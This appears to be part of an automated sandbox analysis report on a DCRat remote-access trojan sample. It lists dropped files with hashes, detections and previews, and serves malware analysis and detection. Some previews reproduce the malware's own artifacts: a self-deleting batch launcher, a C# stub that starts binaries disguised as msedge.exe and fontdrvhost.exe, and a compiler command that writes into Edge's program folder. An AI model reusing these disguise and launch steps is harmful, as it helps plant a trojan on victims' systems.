                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\Desktop\Wh2c6sgwRo.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.1209886597424439
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):174
                                                                                          Entropy (8bit):5.393979681157607
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7cfS33H6wP0dLvBktKcKZG1CHyg4E2J5xAIVNf:hCRLuVFOOr+DE7cqa0kLvKOZG1CHhJ2f
                                                                                          MD5:4EA08A80E9BA484177F5D93C84E3D8B5
                                                                                          SHA1:6CEE0D675FC1CCAEBC0368551B64BCAE87A0BBBA
                                                                                          SHA-256:FE3865FCE70CB26C35934D79C9EBCD6FD964823D639A9272D2AD745FA6F48714
                                                                                          SHA-512:76D24880CD74CB761F72C79FEE4F05187CD1E8F32C3AA14004F8577F2D0E8147D63359D63673FC1362088F36669CA578A838A6312F7A829748683D93F4C21AEC
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\dmMZ8RlPbE.bat"
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25
                                                                                          Entropy (8bit):4.5638561897747225
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:btupwIo:Jups
                                                                                          MD5:E31C4F4D2448441FDE1405B7D6C32BDF
                                                                                          SHA1:6C057457FC417313BF848E4D3A80E3D98FCE9F41
                                                                                          SHA-256:F8E709C30F4A58E4735547F91F2068AFA71C35C846FC44BF403061AD86DDA4A8
                                                                                          SHA-512:C5FDB2262178BC45DCAAD5AE7BC0CCF30B4765B082DDFAAB287FD8A6A50180958F5AEEA36B106742C28032011D0B2FA1D222E6F6838A92B20220677FB2D84C5A
                                                                                          Malicious:false
                                                                                          Preview:ukHS4l6021BwYpLIkUcft8GNM
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):1.3909341910495931
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                                          MD5:1EB30D95ED94CA01369986C3811A0591
                                                                                          SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                                          SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                                          SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25
                                                                                          Entropy (8bit):4.213660689688185
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:0ruPEyHgN:SuPEyAN
                                                                                          MD5:454E18D2793D998A7C318DF8F984DCA5
                                                                                          SHA1:06AB78AFC1CFFCDB5DD5AE9D6EA90861803D432C
                                                                                          SHA-256:07A48FE6218BADC877CA7F462D315C53AF0A0EDE27F1AA8CA5F3CD6A2A2B0E49
                                                                                          SHA-512:2C86A2564C2E1E7288E808A9886C71C1A9B2E270AB030D2AF8FA0398DBC6AA36C0150C0B3B640086D4C6812E05576BABDD212B94F1DFCAF825A84E5506DEB3BB
                                                                                          Malicious:false
                                                                                          Preview:StvN4UxNJ39jfglv8hGbbgFvd
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                          Category:dropped
                                                                                          Size (bytes):396
                                                                                          Entropy (8bit):4.9238041556274785
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLkiFkD:JNVQIbSfhWLzIiFkMSfhVFkD
                                                                                          MD5:757BEBC24CC2EE0533EBA9A1FF3AAEC1
                                                                                          SHA1:F550D10D42539516B690A7F1F3A94F48F2F822E5
                                                                                          SHA-256:72A23A3A3014689B4BAE5A10CD03FC1FF06A9AB0B98FC219F908C76F26DD1D5F
                                                                                          SHA-512:AD0C7D3E343D3D7690542919E1EFAFAF63AACCFDB83F21399D79E9B92955CB60CC10827C4BC62D455BAC13A58020D616CD723472F0291CEC4B8909C416CAFC55
                                                                                          Malicious:false
                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\fontdrvhost.exe"); } catch { } }).Start();. }.}.
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):266
                                                                                          Entropy (8bit):5.089399053072649
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oCHhJ23fCXun:Hu7L//TRRzscQDaXu
                                                                                          MD5:7051DAB1B0376FCF7E6AC09271CF5887
                                                                                          SHA1:3AAC4A0F4A63580AB31380EEC9023BB68082CBCE
                                                                                          SHA-256:D16B7EF367CF1C4CB2A90F27AA551E9A0D333A181E578770741C25B136C482CD
                                                                                          SHA-512:5DD70D9E7F83C1AFF7F13ABB825299E3599A759BA11FB91291AC76AEC8A56BB868BFDB0143190E359CEB18D46BC968ADE5E8218C9D0B990E4D6A5023DC404F8F
                                                                                          Malicious:true
                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.0.cs"
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):767
                                                                                          Entropy (8bit):5.236019919361814
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:K8/I/u7L//TRRzscQDaXPKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOI/un/VRzstDwKax5DqBVKVrdFAMBJj
                                                                                          MD5:F714776F054FD0946F052CB62D0519C1
                                                                                          SHA1:089F61DB49A4E8B04F0BFE9C396C678FB1124761
                                                                                          SHA-256:AC9F4012F67F96C9C741648617505DA4DACEFDA7BC7C93B72403D494645A8656
                                                                                          SHA-512:6CEC1F09431F7DAE120082CC99C21BBBCBF3DC2275EED6C9BACB7C6EDA1FA4C9F059E630E9B77304CBE2DEFD2A03EA264CD86257269B03908894F51D381FD4CF
                                                                                          Malicious:false
                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.6732424250451717
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
